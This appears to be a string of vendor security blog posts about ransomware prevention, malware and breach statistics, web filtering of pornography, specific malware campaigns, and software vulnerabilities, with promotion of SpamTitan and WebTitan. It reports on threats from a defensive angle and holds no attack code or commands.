McAfee recorded 1.3 million new ransomware samples in the first half of 2016. The risk of infection with ransomware has increased as authors employ increasingly sophisticated methods of evading detection. Ransomware is also spreading faster and encrypting even more data to ensure victims have no alternative but to pay up.
But how is it possible to prevent ransomware attacks? Unfortunately, there is no silver bullet. Prevention requires several different strategies to be adopted. To prevent ransomware attacks, check out the ransomware protection tips below.
Ransomware Protection Tips
We have listed some ransomware protection tips below that will help you to avoid ransomware infections – And how to avoid paying a ransom should the unthinkable happen.
The first rule of ransomware avoidance is backing up your data
The no More Ransom Project is a great initiative. When ransomware variants are cracked and decryptors developed, they are being uploaded onto the No More Ransom site. Victims can then decrypt their files for free. However, there are more than 200 ransomware families and less than 10 free decryptors. You don’t need to have majored in mathematics to work out that the probability of a decryptor being available is rather small. If you want to be able to avoid paying a ransom you must have a viable backup of your data.
The second rule of ransomware avoidance is backing up your data
Without a backup, you will need to pay the ransom if you want your data back. You therefore need to make sure you have a viable backup file. However, multiple backups should be performed. You should have a backup on an external hard drive and a second backup in the cloud. Your external drive must also be disconnected once the backup has been performed.
Keep software up to date
Vulnerabilities are constantly being discovered and patches issued to plug security holes. Even if exploits have not been developed to take advantage of those vulnerabilities, patches can be reverse engineered. Once patches are released, it will only be a matter of time before exploits are developed. It is therefore essential to apply patches and install software updates promptly. Patches should be prioritized with critical updates applied first.
Remove unnecessary software and browser plugins
If you have browser plugins installed that you never use, remove them. They are an unnecessary risk. Of particular concern are Adobe Flash, Java, and Silverlight. Vulnerabilities are regularly discovered in these plugins and for many businesses they are surplus to requirements. Remove them or at least set them to require manual activation.
Malvertising may not be the most common method of ransomware delivery but the risk should be mitigated nonetheless. Businesses should use an adblocker to prevent malicious adverts from being displayed. Do your employees need to see web adverts? If not, why take the risk?
Filter the Internet
Malicious websites containing exploit kits can probe for a wide range of security vulnerabilities and leverage these to silently download ransomware. WebTitan can be configured to block websites known to contain malware and block sites by category. Categories of websites known to be ‘high risk’ can be blocked, as well as sites that have no work-purpose. Blocking access to certain categories of websites can greatly reduce the risk from web-borne ransomware and malware infections.
Conduct security awareness training
Security awareness training is not just for employees. All individuals in an organization should be taught the security basics from the CEO down. Training should include phishing awareness and avoidance, ransomware and malware, and good security best practices such as never opening emails from unknown sources, not enabling macros, and avoiding clicking links in spam and suspicious emails.
Turn off macros
Macros are used in many organizations, but not by the majority of employees. Macros should be disabled on all devices unless essential, and even then, macros should be enabled manually on documents and spreadsheets if required.
Employ a robust spam filtering solution
A paid-for spam filtering solution should be installed to catch spam emails and prevent delivery. Email is one of the most commonly used ransomware delivery mechanisms. Anti-spam solutions such as SpamTitan can greatly reduce the probability of employees’ security training being put to the test.
Use anti-malware and anti-virus solutions
Employ anti-malware and anti-virus solutions that include a real-time scanning feature and set the solutions to update virus/malware definitions automatically. Full system scans should also be periodically conducted.
The threat from malware is now greater than ever before in the history of the Internet. New malware is being developed at alarming rates, and traditional antivirus software developers are struggling to maintain pace and prevent new forms of malware from being installed on endpoints.
Not only are malware developers creating ever stealthier information stealers, Trojans, and ransomware, the methods used to install the malicious software are becoming much more sophisticated. Keeping endpoints and networks free from infection is becoming far more complicated, while the cost of dealing with malware infections is increasing. Figures from the Ponemon Institute suggest the average cost of a data breach has now reached $4 million.
2015 saw some of the largest data breaches ever discovered and the situation is getting worse. The 78.8-million record attack on Anthem Inc. may have been one of the worst ever data breaches in terms of the number of individuals affected and the amount of data obtained by the attackers, but 2016 has seen even larger data breaches uncovered.
The attack on LinkedIn, which was discovered in May this year, affected 117 million users. The data breach at MySpace resulted in 460 million passwords being obtained by hackers, 111 million of those records also included a username. However, even those massive data breaches were dwarfed by the discovery of the data breach at Yahoo Inc., this month. Hackers were found to have obtained the information of around 500 million individuals.
Not all of those data breaches involved the use of malware, but a large percentage of smaller breaches have occurred as a result of malware infections and the threat from ransomware has grown significantly over the past few months.
Threat from Malware Greater than Ever Before
This month, a study conducted by Proofpoint has cast more light on the seriousness of the threat from malware and the extent to which organizations are being attacked and the seriousness of the threat from malware. The Proofpoint 2016 Security Report shows that throughout 2015, an average of 274 new forms of previously unknown malware were discovered every minute. 971 forms of unknown malware hit organizations every hour in 2015. That’s 9 times the downloads that occurred in 2014. Proofpoint’s research indicates 12 million new pieces of malware were discovered every month last year.
Proofpoint’s study revealed that in 2015, 89% of organizations downloaded a malicious file. In 2014, only 63% of companies reported downloading malicious files. In 2014, malware was downloaded every 6 minutes on average. In 2015, new malware was being downloaded every 81 seconds. In total, almost 144 million new malware were found in 2015. Out of the 6,000 gateways analyzed by Proofpoint, 52.7% were found to have downloaded at least one file infected with malware, and an average of 2,372 infected files were reported per gateway.
Email remains one of the most common vectors for malware delivery. Attackers are sending malicious emails containing scripts that download malware, or links to websites containing exploit kits that download information stealers, Trojans, and ransomware.
There was a small decline in the number of malicious websites that were accessed by employees. In 2014, 86% of organizations reported that end users had visited malicious websites. In 2015, 82% of organizations said employees had visited malicious websites.
However, employees in enterprise organizations were five times more likely to visit malicious websites in 2015 than in 2014. On average, enterprise employees visited malicious websites every 5 seconds. In 2014, malicious websites were accessed every 24 seconds.
Protecting Against Malware Attacks
Defending against malware attacks requires more than an anti-virus or anti-malware solution. Multi-layered cybersecurity defenses are required to cope with the onslaught.
Training programs should be conducted regularly to ensure employees are aware of the risks and latest threats. Knowledge should also be put to the test by conducting phishing training exercises.
Technical solutions should include anti-virus, anti-malware, and anti-bot software. Virus and malware definitions must be kept up to date and regular network scans conducted to identify infections rapidly.
Since email is the most common attack vector, anti-spam solutions should be employed. By using a robust anti-spam solution such as SpamTitan it is possible to prevent the vast majority of malicious emails from being delivered to end users. SpamTitan blocks 99.7% of spam email.
A URL filtering solution such as WebTitan should also be employed to prevent end users from visiting malicious websites and downloading malware. WebTitan can be configured to prevent end users from visiting websites known to contain malware and exploit kits. Malicious third party adverts – malvertising – can also be blocked, as can categories of websites which carry a high risk of containing malware.
Along with advanced threat prevention technologies, application controls, intrusion prevention systems, and good patch management policies it is possible to prevent the vast majority of malware attacks. However, with the volume of malware now being released and the extent to which hackers are attacking organizations, failing to commit improve cybersecurity defenses is likely to see organizations become another breach statistic.
The American Civil Liberties Union (ACLU) of Rhode Island has praised the General Assembly for introducing more transparent standards for the use of Internet filters in schools in the state.
Since the passing of the Children’s Internet Protection Act (CIPA), K-12 schools and libraries that apply for E-Rate discounts have been required to implement a web filter to restrict access to inappropriate or harmful website content. The web filter must be configured to block obscene images, child pornography, and other content that could be considered harmful to minors.
Overzealous Use of School Internet Filters in Rhode Island
While schools in Rhode Island have complied with CIPA, many have gone further and have used Internet content filtering software to block far more website content than CIPA requires. Blocking potentially harmful website content protects children from harm; however, schools must take care not to overblock website content.
There is a clear difference between pornographic content which contains images of naked individuals and artwork which depicts nudes for example. The former has potential to cause harm to minors, the latter has educational value and should not be blocked. If there are no standards for the use of Internet filters in schools, it is all too easy for valuable educational material to be inadvertently blocked.
Three years ago UCLA published a report on how overblocking of website content can harm public education. The report details some of the difficulties staff and students have had accessing valuable website content after web filtering solutions have been implemented in educational establishments in Rhode Island.
Internet filters allow website content to be blocked based on categories. Schools may, for instance, choose to block content relating to alcohol. However, the report says some students had tried searching for polyvinyl alcohol – information on which was required for their studies, yet the content was not accessible because the Internet filtering category “alcohol” had been blocked.
Students who want to access LGBT information or individuals wishing to find out about sexually transmitted diseases should be able to access that information, yet this type of website content can all too easily be blocked if Internet filters are not carefully applied. The ACLU believes that transparent standards for the use of Internet filters in schools are necessary. Schools should be open about the type of content that they block and the reasons for doing so. With greater transparency students can be protected from harm, yet have access to valuable educational material.
New Standards for the Use of Internet Filters in Schools in Rhode Island
Rep. Art Handy and Sen. Adam Satchell sponsored the new bills (H-7583-A and S-2172-A) which require written policies to be implemented which explain the categories of website content which are blocked by the state Department of Education and school districts. The new legislation also requires reasons to be provided for blocking specific categories of website content. Policies must also be reviewed on an annual basis.
Hillary Davis, policy associate of ACLA of Rhode Island, praised the introduction of new standards for the use of Internet filters in schools by the General Assembly. She said, “The Internet offers a world of educational opportunities that Rhode Island’s students have been denied because of overzealous filtering software.” Davis went on to say, “This new law will go a long way toward ensuring teachers can bring their full range of resources to the classroom, and that students can complete their studies without interruption or frustration.”
McDonalds and Starbucks have recently announced that they have taken steps to block porn on WiFi networks that can be accessed by their customers. McDonalds restaurants in the United States already have a web filtering solution in place that prevents customers from accessing pornographic material via their in-restaurant WiFi networks. Mature content – such as online streaming of TV shows such as Game of Thrones – will still be possible. Starbucks has also recently followed the lead of McDonalds and will soon implement a web filtering solution to block pornography.
McDonalds is the largest fast-food chain in the United States, operating more than 14,000 restaurants. Starbucks is the largest coffee shop chain in the United States, with more than 12,200 outlets in the U.S. Due to the size of the chains, and their popularity with children and families, both organizations have faced pressure from Internet safety organizations to start implementing controls to limit the website content that can be accessed via their WiFi networks.
McDonalds Chooses to Block Porn on WiFi Networks in its Restaurants
McDonalds started to block porn on WiFi networks available to customers earlier this year. According to a statement issued by the fast-food chain, the corporation was previously unaware that there was a problem with customers accessing pornography inside its restaurants or that consumers wanted restrictions to be placed on its WiFi networks.
After the not-for-profit Internet safety organization Enough is Enough reached out to the CEO of McDonalds last year and suggested WiFi network porn filtering should be implemented, the fast-food chain reacted “promptly and positively.”
McDonalds recently issued a statement saying “We had not heard from our customers that this was an issue, but we saw an opportunity that is consistent with our goal of providing an enjoyable experience for families.”
McDonalds started exploring web filtering solutions to block pornography on WiFi networks in its restaurants and, after researching the available options, McDonalds implemented a WiFi network porn filtering solution in Q1, 2016. Last week, McDonalds announced that a web filtering solution had been deployed to block porn on WiFi networks in its restaurants.
WiFi Network Porn Filtering to be Implemented by Starbucks
Hot on the heels of the announcement by McDonalds was a press release confirming that Starbucks had taken the decision to block porn on WiFi networks in its coffee shops.
Two days after the McDonalds announcement, Enough is Enough reported that Starbucks had also opted to block porn on WiFi networks in its coffee shops in the United States. When the evaluation process has been completed, and a suitable WiFi network porn filtering solution has been selected, it will be rolled out worldwide across the company´s coffee shops to ensure that all customers are protected from exposure to pornographic material.
A spokesperson for Starbucks said, “We are in the process of evaluating a global protocol to address this in all of our company owned stores, and are in active discussions with organizations on implementing the right, broad-based solution that would remove any illegal and other egregious content.”
Enough is Enough has been campaigning for safer Internet since the group was formed in 1994. In 2014 the organization launched a new campaign to place pressure on corporations in America to use WiFi network porn filtering to ensure that children and families could access the Internet safely without being exposed to pornographic material.
Increasing Pressure on Corporations to Implement WiFi Filtering Solutions to Block Pornography
Enough is Enough claim “Internet safety is now the fourth top-ranked health issue for U.S. children with peer- reviewed research confirming Internet pornography as a public health crisis.” The organization says that individuals are increasingly using open WiFi networks to gain access to online pornography and child pornography. They cite news reports that public WiFi networks are also being used by individuals to share obscene, abusive, and illegal images.
Enough Is Enough has been putting an increasing amount of pressure on organizations in the United States over the past two years to carefully control the content that can be accessed via WiFi networks. The organization has now gained the support from 75 partner organizations including the Salvation Army, National Coalition to Protect Child Sexual Abuse, U.S Department of Justice, American Family Association (AFA), Family Research Council (FRC), and the National Center on Sexual Exploitation.
Enough is Enough and the National Center on Sexual Exploitation recently appealed to Starbucks to follow the lead of McDonalds and implement a WiFi web filtering solution to block porn on WiFi networks accessible to its customers.
Both organizations will now be increasing their efforts to get other corporations in the United States to make a similar decision and block porn on WiFi networks in order to provide family-friendly Internet access.
New Locky ransomware variants are frequently developed to keep security researchers on their toes. The malicious ransomware is highly sophisticated and further development allows the gang behind the crypto-ransomware to keep raking in millions of dollars in ransoms.
According to security researchers at Avira, a new Locky variant has now been discovered with new capabilities that spell trouble for businesses, even those with highly advanced security systems in place. Now, even rapid detection of Locky will not prevent files from being encrypted. Even if Locky cannot contact its command and control server, it will still execute and encrypt files. Previous Locky ransomware variants would only encrypt files after C&C server contact was established.
This means that if Locky is detected on a computer, shutting down the network or blocking communications will not prevent files from being encrypted. This is one of the few options open to organizations to limit the damage caused if ransomware is discovered.
New Locky Ransomware Variants Encrypt Without C&C Server Contact
Many of the latest ransomware strains use public key cryptography to lock users’ files. They will not encrypt files if systems are taken offline because they require contact with a C&C server to obtain the public-private key pairs that are used to lock files. These are only generated if a connection to the C&C is made. The private key that is used to unlock files is stored on the attacker’s server and never on the local machine that is infected.
Without a connection, unique keys for each user cannot be generated. This means that even if millions of computers are locked, one key will unlock them all. By generating a unique key for each infection, a ransom must be paid for each device that is encrypted. Without this, a business would only need to pay one ransom payment to unlock all infected devices.
Fortunately, that is the case with the latest Locky strain. If no C&C contact is made, all infected devices will be locked with the same key. That means only one ransom payment may need to be paid. However, if C&C contact is established, the AES encryption key will be encrypted using a separate RSA encryption key for each device and multiple payments will be required.
Avira reports that the new Locky ransomware variants use separate types of victim IDs, depending on whether files were encrypted offline or online. Offline infections use a 32-character alphabet for the victim IDs – “YBNDRFG8EJKMCPQX0T1UWISZA345H769” – rather than hex digits. By doing so, the attackers can determine which key to supply to unloick the encryption.
According to Avira’s Moritz Kroll, “Theoretically, if a company with a domain controller is hit by the new Locky and sees a non-hexdigit ID like ‘BSYA47W0NGXSWFJ9’, it might be cheaper to generate a victim ID with the same public key ID but without saying it’s a corporate computer.” That key can then be used for all other devices that have been infected.
While this may work, it is no substitute for having a viable backup. It is also far better to block the malicious spam emails that are used to deliver the ransomware using an advanced spam filtering solution such as SpamTitan, and to prevent drive-by downloads using WebTitian.
If you want to keep your computers and network protected, you should ensure that browsers are patched as soon as updates are made available. However, end users may be fooled into taking action to keep their computers secure and inadvertently use fake Firefox updates.
Fake FireFox Updates Used to Install the Kovter Trojan
Fake Firefox updates are being used by the gang behind the Kovter Trojan. A new version of the fileless malware has been identified recently, and it is infecting users by posing as a fake Firefox update.
The cybercriminal gang behind Kovter frequently tweak the malware and come up with new ways of infecting end users. Kovter is a particular worry as it can be particularly difficult to detect. Being fileless, there are no actual files to detect. The malware resides only in the memory, and it ensures it is reloaded into the memory each time a computer is rebooted with a Windows registry component.
Kovter can perform a range of malicious activities, such as redirecting users to malicious websites, performing click fraud, downloading other malware, and now also encrypting files. The latest variant discovered by CheckPoint also has ransomware capabilities.
When users visit a malicious or infected website they are presented with fake Firefox updates and are urged to download the latest version to keep their computers secure. Researchers at Barkly discovered that the gang behind the latest Kovter campaign are using a legitimate certificate to fool antivirus engines. The certificate was issued to Comodo, although it has since been revoked. Anti-virus engines are also now being updated to detect the malware and block its download.
Preventing Drive by Malware Downloads
There are a number of steps that can be taken to prevent drive-by downloads of malware such as Kovter. Policies should be implemented that prohibit end users from performing software updates, which should be left to the IT team to handle. Patch management policies should be developed and implemented to make sure that when software updates and patches are issued, they are installed promptly or preferably automatically.
Browsers should never be updated outside the normal update process. To check if the latest version is installed, simply click on the help function, followed by the About option, and the browser will check to determine whether an update is available.
A web filtering solution is also an important security control to employ to prevent drive-by downloads. A web filter can be configured to block access to webpages known to contain malware and restrict access to non-work related websites which carry a high risk of malware infections. Some web filtering solutions – WebTitan Gateway for example – can also scan websites in real-time to check for known indicators of drive-by downloads and exploit kits. WebTitan then prevents the sites from being visited.
A new law has been approved by the House of Representatives that will require government agencies to block pornography on computers used by federal employees.
The accessing of pornography in the workplace is a serious issue. While the employees who access the adult material at work may feel like they are doing no harm, the accessing of adult websites carries an unnecessary risk of malware being downloaded onto computers and government networks. The recent massive data breaches experienced by government agencies have highlighted the need for improved protections to be implemented.
Eliminating Pornography from Agencies Act Passed by House
Rep. Gary Palmer (R-Alabama)-sponsored the bill – the Eliminating Pornography from Agencies Act (H.R. 901) – which is part of a new government reform package. Palmer saw a need to introduce new laws to block pornography on computers after it became clear that the problem was widespread in federal agencies.
Federal workers were suspected of accessing pornography at work and internal investigations revealed that a number of workers had been accessing sexually explicit material; in some cases, for many hours each day.
One notable instance involved a worker who was suspected of accessing pornography on a federal computer. When EPA Office of the Inspector General (OIG) investigators visited the employee, he was actually viewing pornography at the time. He admitted to accessing the material for two to six hours a day.
The Securities and Exchange Commission (SEC) OIG also conducted investigations. A 2010 report indicated 33 employees had been discovered to be accessing pornography at work. Last year, media reports suggested there was a porn crisis in the federal government, saying the problem was serious and widespread.
Aside from the huge drain on productivity, if an agency fails to block pornography on computers there is a considerable risk of employees infecting their computers with malware or causing a data breach.
The reform bill was passed 241-181. The new law will require agencies to block pornography on computers for all workers, although access will still be permitted for certain individuals who require access to the material as part of their investigations.
WebTitan – A Quick and Effective Way to Block Pornography on Computers
WebTitan is a highly effective, but easy to implement web filtering solution that can be used to quickly block a wide range of inappropriate web content from being accessed by employees. WebTitan is an enterprise-class web filter that allows organizations to block specific categories of web content such as pornography.
Once the solution is installed, to block pornography on computers system administrators only have to tick a checkbox. Websites and webpages containing pornographic images will no longer be able to be accessed by employees. Since WebTitan ties in with Active Directory, it is easy for different permissions to be set for individuals, user groups, or for the entire organization.
Filters can also be applied to block productivity draining websites such as Social media platforms, gambling websites, and gaming sites. Bandwidth draining activities such as video and audit streaming can also be blocked, as can websites known to contain exploit kits or malware.
WebTitan can be used to quickly and easily enforce acceptable usage policies and improve the productivity of the workforce as well as an organization’s security posture.
Mobile ransomware may not be nearly as prevalent as its PC counterpart, but attacks on mobile devices are on the rise according to a new report issued by anti-virus firm Kaspersky Lab.
Kaspersky Lab assessed thwarted ransomware attacks on mobile users over a period of two years and saw that the numbers of attacks doubled, signifying a worrying new trend.
Between 2014 and 2015, 2.04% of malware attacks on mobile users involved ransomware. Between 2015 and 2016, the percentage of ransomware attacks rose to 4.63%. During that period, 136,532 attacks took place.
Kaspersky Lab noted that the ransomware used to infect mobile devices differs considerably from the strains used to infect PC users. While Locky, CryptXXX, and RAA are now the main threats affecting PCs, the main mobile ransomware strains currently being used are Fusob, Small, Svpeng, and Pletor.
Mobile ransomware tends not to use encryption to lock files, instead malicious software is developed that blocks users from accessing their device. Oftentimes, this is achieved with a simple HTML overlay. Encryption is more effective on PCs because many users fail to back up their data, or when they do they leave their backup devices connected. Many strains of PC ransomware are able to delete backup files or encrypt them, leaving end users with no alternative but to pay the ransom or lose their data forever.
Many mobile users automatically backup their data in the cloud. If data is ever lost or encrypted, files can easily be recovered. However, overlays prevent the user from being able to access their files from the device. With mobile devices victims cannot simply take out a hard drive and plug it into another machine and manually remove malicious files. If an infection takes place, users either have to pay the ransom or replace their device. Provided the ransom is lower, many users will end up paying.
Without the need for encryption, the development of mobile ransomware is considerably cheaper. The ransoms that can be demanded may be lower than for PC infections, but campaigns can be highly profitable for cybercriminals.
Criminal gangs are also using an affiliate model to spread infections. There is usually no shortage of actors willing to invest the time distributing the malicious software in exchange for a cut of the ransom. In many cases, signing up for these affiliate ransomware campaigns is easy. The developers of the malware release kits to make it as easy as possible. Programming skill is not even needed.
Mobile Ransomware Attacks Will Continue
The use of mobile ransomware is increasing significantly because it is effective. An increasing amount of data are now stored on mobile devices, and end users – and business users in particular – are unwilling to lose their data. As long as ransoms are paid, attacks will continue and are likely to increase. Cybercriminals will only stop developing new mobile ransomware strains when the campaigns prove to be ineffective and unprofitable.
A new threat has recently been discovered by security researchers at Phishme: Bart ransomware. The new ransomware variant is not as sophisticated as Locky and Samsa, but it is still highly effective and poses a risk to businesses. Should end users be fooled into opening spam emails, file recovery will only be possible via backups if the ransom demand is not paid.
Bart Ransomware Locks Files in Password-Protected ZIP Files
Bart Ransomware bears a number of similarities to other ransomware variants that have been discovered in recent months. If installed on a device, media files, photos, documents, spreadsheets, databases, and a host of other files are located and encrypted. Bart ransomware also encrypts .n64 ROM files, which was previously unique to Locky ransomware. Bart is also delivered using the same Dridex botnet that was used to deliver Locky.
Bart ransomware also uses a payment interface that looks very similar to Locky. However, there are notable differences to Locky and other ransomware variants. Bart demands a particularly high payment from its victims. Rather than a demand of 0.5 Bitcoin, Bart asks for 3 Bitcoin per infected machine – Approximately $1988 per device.
There are also notable differences in the method used to encrypt files. Bart doesn’t use public key cryptography. Files are added to zip files which are then password protected. In order to unzip files, a password must be supplied. These passwords are only supplied to the victim if the sizeable ransom is paid.
Bart also does not use the typical command and control center infrastructure. Most new ransomware variants communicate with the attackers’ command and control center before files are encrypted, but that does not appear to happen with Bart.
New Ransomware Variant Delivered via Spam Emails
The ransomware has been developed to attack users in the west, and will not lock files if the operating system is in Russian, Ukrainian, or Belorussian.
To prevent infection, it is essential that end users do not open the infected email attachments. Since the emails may appear benign to end users, organizations should take steps to prevent the spam emails from being delivered. One way of doing this is to use SpamTitan. SpamTitan can be configured to block zip files and prevent them from being delivered to end users.
If spam emails are not delivered, end users will not be able to inadvertently infect their devices. Furthermore, the cost of deploying SpamTitan is likely to be considerably less than the cost of a single ransom payment to resolve a Bart infection.
There have been a number of high-profile data breaches reported in recent weeks, now Citrix has announced its users have been impacted after receiving multiple reports of GoToMyPC password reuse attacks. An investigation into the attacks revealed that the account compromises were not the result of a Citrix data breach, but that the attacks had been made possible due to poor security practices of some of its users.
Passwords Reset After Spate of GoToMyPC Password Reuse Attacks
After discovering the GoToMyPC password reuse attacks, Citrix performed a password reset on all users’ accounts to reduce the risk of account compromises. When users next login to the remote desktop access service they will be required to set up a new password before being allowed to access the service.
While Citrix has taken steps to protect its own users, simply changing passwords on GoToMyPC will not protect users who share passwords across multiple applications and web services. It is therefore important for users to login to all online accounts that have the same password set and to create new, unique passwords for each.
Following the cyberattacks on LinkedIn, MySpace, and Tumblr, login credentials were openly sold on darknet marketplaces. Many individuals purchased the data and have been searching online platforms to find users that have accounts elsewhere. The same passwords are then tried to see if access can be gained.
Shortly after these data dumps, numerous Twitter accounts were hacked, including those belonging to a number of high profile celebrities – Katy Perry, Mark Zuckerberg, Tenacious D, and Lana Del Rey for example. While the hacking of a Twitter account may only be an inconvenience for many victims, far more serious hacks have occurred.
TeamViewer remote desktop connection software was targeted by attackers who had obtained data from the LinkedIn breach. Users’ accounts were accessed and the software leveraged to obtain access to users’ PayPal accounts and bank accounts, primarily using passwords saved in browsers. The victims had their bank and PayPal accounts emptied. Some individuals also reported that TeamViewer had been used to install ransomware on their computers.
Since many individuals share passwords on personal accounts and business accounts, the latter may also be compromised and that can have highly serious implications.
The Danger of Password Sharing
All organizations face a threat of cyberattacks and sooner or later it is likely that one of those attacks will be successful. If users’ login credentials are obtained, they can be used to access accounts on other web and software platforms.
The spate of recent attacks shows how dangerous it can be to use the same passwords for multiple accounts. While it is certainly convenient to use the same password on multiple platforms, users stand to have their entire online identity hijacked as a result of a single cyberattack on one company.
To limit the damage caused, it is essential to use a unique, complex password for each online account, never to recycle passwords, and to update passwords frequently. Sys admins should ensure that password policies are set that require complex passwords to be created. Password expiration policies should also be developed and implemented. Password managers can be used to help end users keep track of all of their passwords.
RAA Ransomware Delivered via Spam Email
First, all drives – local, network, and portable – are scanned for specific file extensions, including documents and spreadsheets (DOC, RTF, XLS, CSV, PDF), compressed files (ZIP, RAR), image files (JPG, PSD, PNG, DWG, CDR, CD), database files (DBF, MDF), and LCD disk images.
The RAA ransomware is set to run automatically each time the computer is booted, and it will install Pony each time. Since the ransomware runs on boot it will encrypt any of the above file extensions that have been created or downloaded since the last time the ransomware was executed. At present, there is no way of decrypting the files without paying the ransom.
To protect against attacks, end users must be vigilant and not open any files attachments sent from unknown individuals. Sys admins must also ensure that all files are regularly backed up and back up devices are air-gapped.
Each year, the Ponemon Institute conducts an annual benchmark study on the cost of a data breach. The IBM-sponsored report reveals just how damaging data breaches can be to a company’s finances. Responding to a data breach costs companies millions of dollars, and each year the cost rises.
Last year, the Cost of a Data Breach study placed the average cost at 3.79 million. This year, the average cost has risen to $4 million. The average cost per stolen record rose from $154 to $158 over the past 12 months.
Average Cost of a Data Breach in the United States is $7.01 Million
However, those figures are taken from the global data collected for the study. The costs incurred by U.S businesses are much higher. Take the figures for the United States alone, and the average cost is $7.01 million. Last year the average cost of a breach response in the United States was $6.53 million.
Organizations in the United States can expect to pay costs of $221 per record, although organizations in the healthcare industry, financial, and life science sector can expect to pay far higher amounts. The cost of a data breach in the healthcare industry is a staggering $402 per record. The data also show that the average number of records exposed per incident also increased.
In the United States, the total cost of a data breach rose by 7% over the space of a year, and by 2% per stolen or compromised record. The Ponemon Institute offers some suggestions why the overall cost of a data breach has increased by such a high degree. One of the main reasons is a substantial rise in indirect costs. When an organization suffers a security breach that exposes sensitive data such as credit card numbers, financial information, Social Security numbers, or medical records, consumers are increasingly taking their business elsewhere. The Ponemon Institute refers to this as the abnormal churn rate.
Organizations Should Try to Reduce Churn Rate After a Data Breach
One of the findings of the research is the higher the churn rate is following a data breach, the higher the cost of the breach will be. Companies that experienced an abnormal churn rate of lower than 1%, had to pay average breach costs of $5.4 million. The cost rose to $6.0 million with an abnormal churn rate of between 1% and 2%, while a churn rate of above 4% resulted in average costs of $12.1 million.
The industries most likely to see customers leave and find alternative companies to do business with were healthcare organizations, financial companies, service organizations, and companies operating in the technology and life sciences industries. Public sector companies, research organizations, and the media experienced the lowest churn rates.
Ponemon suggests that one of the best ways to reduce the financial impact of a data breach is to put greater effort into retaining customers and adopting strategies to preserve brand value and reputation. Consumers now understand that data breaches are a fact of life, but they expect action to be taken by organizations that have suffered a breach that exposed their personal information. Issuing breach notifications quickly, offering credit monitoring services to affected individuals, and taking steps to greatly improve security can all help to reduce fallout after a data breach occurs.
Malicious Attacks Cost the Most to Resolve
All data breaches will result in organizations incurring costs, but the cause of a data breach will dictate how high those costs will be. Malicious attacks on organizations were discovered to cost the most to resolve. In the United States, the average cost per record for a malicious or criminal attack was $236. For system glitches the cost was £213 per record, and for human error the cost was $197 per record.
The costs incurred can be reduced significantly if organizations take steps to prepare for data breaches. The Ponemon Institute determined that having an effective breach response plan can greatly reduce the cost of a data breach. When an organization can respond quickly to a breach the costs tend to be much lower.
The average time to contain a data breach was determined to be 58 days. Organizations that were able to contain a data breach in less than 30 days paid an average cost of $5.24 million per breach, compared to $8.85 million when the time to contain the breach exceeded 30 days.
It also pays to invest in technologies that allow organizations to identify breaches quickly when they do occur. The mean time to identify a breach was determined to be 191 days – more than 6 months. When the mean time to identify a breach was less than 100 days, the breach cost was $5.83 million. When the mean time to identify a data breach exceeded 100 days, the mean cost rose to $8.01 million.
The costs of breach resolution are continuing to rise. Organizations should therefore consider investing more heavily in technologies to prevent data breaches and to increase the speed at which they are detected. The results of the study clearly demonstrate that having a tested breach response plan in place is essential if costs are to be reduced.
The security threat from bloatware was made abundantly clear last year with the discovery of a Lenovo bloatware vulnerability, affecting the Superfish Adware program that came pre-installed on Lenovo laptops.
Bloatware is a term used to describe software applications and programs that are largely unnecessary, yet are pre-installed on new computer and laptops. The software programs can slow down computers and take up a lot of memory, yet offer the user little in the way of benefits. They are primarily used to update application features rather than to enhance security.
Unfortunately, these pre-installed programs have been discovered – on numerous occasions – to contain security vulnerabilities that can be exploited by malicious actors and used for man-in-the-middle attacks. They can even let attackers run arbitrary code, allow privilege escalation, or perform malicious software updates.
Now a new Lenovo bloatware vulnerability has been uncovered. This time it concerns the company’s software updater which has been found to contain a vulnerability that could potentially be exploited allowing man-in-the-middle attacks to be conducted.
New Bloatware Vulnerability Found in Lenovo Accelerator Application Updater: Uninstall Recommended
The Lenovo Accelerator Application has been pre-installed on a wide range of desktop computers and notebooks shipped pre-installed with Windows 10. In total, well over 100 different models of Lenovo notebooks and desktops have the Lenovo Accelerator Application installed. Lenovo says the application is used to speed up the launching of Lenovo applications and communicates with the company’s servers to determine whether application updates exist.
The UpdateAgent pings Lenovo’s servers every 10 minutes to check whether updates have been released. However, the application has recently been discovered to contain a security vulnerability that could be exploited by attackers. DuoLabs investigated a number of companies to check for security vulnerabilities in pre-installed software applications and found that Lenovo’s UpdateAgent was particularly vulnerable to attacks.
DuoLabs reported that the updater had “no native security,” and that “executables and manifests are transmitted in the clear and no code-signing checks are enforced.” The security flaws could allow an attacker to intercept these communications and manipulate responses, even allowing malicious software updates to be performed.
Lenovo has responded by issuing an advisory recommending all owners of the affected devices uninstall the software application. This is a straightforward task that can be performed by accessing the Apps and Features application on a Windows 10 computer, selecting the Lenovo Accelerator Application and manually uninstalling the program.
A new WordPress plugin vulnerability was recently uncovered that is being actively exploited. The vulnerability affects the WP Mobile Detector plugin, which is used to determine whether a website is being viewed on a desktop or mobile device. The plugin then serves a compatible WordPress theme.
The plugin was one of the first to be able to distinguish whether a device was a standard mobile or a Smartphone, and as of the start of May, the plugin had been installed on more than 10,000 WordPress websites.
WP Mobile Detector WordPress Plugin Vulnerability Exploited to Install Porn Spam Doorways
The WordPress plugin vulnerability was detected by Plugin Vulnerabilities, which noticed a HEAD request for a file called /wp-mobile-detector/resize.php, even though the plugin had not been installed on the site.
Researchers at Plugin Vulnerabilities concluded that the request was made by an individual attempting to determine whether the plugin had been installed in order to exploit a vulnerability. After searching for reports of a known vulnerability and finding none, researchers investigated further and discovered the plugin had an arbitrary file upload vulnerability.
The vulnerability is straightforward to exploit and can be used to upload malicious files to the cache directory, host spam content, redirect users to malicious websites, or install malware. Since the plugin performed no checks to validate input from untrusted sources, an attacker would be able to insert a src variable containing a malicious URL and PHP code.
Many of the infections uncovered so far have involved the installation of porn spam doorways. Sucuri reports that the WordPress plugin vulnerability has been exploited since May 27.
Since the discovery of the WP Mobile Detector plugin flaw last week, the plugin was temporarily removed from the WordPress plugin directory. The developer of the WP Mobile Detector plugin has now fixed the vulnerability. Any site owner that has the plugin installed should immediately update to version 3.6.
However, simply updating to the latest version of the plugin will not remove malware if it has already been installed. If web shells have already been installed, attackers could still have an active backdoor to the site allowing them to continue to upload malicious files or inject malicious code into webpages.
One of the easiest ways to check to see if a site has been compromised is to look for a directory called gopni3g in the site root. The directory will contain a story.php file, and “.htaccess and subdirectories with spammy files and templates,” according to Sucuri researcher Douglas Santos.
The Federal Bureau of Investigation (FBI) has issued a new security alert warning of a new wave of extortion email schemes. The alert was issued after its Internet Crime Complaint Center (IC3) started receiving multiple reports from individuals who had been threatened with the exposure of their sensitive data.
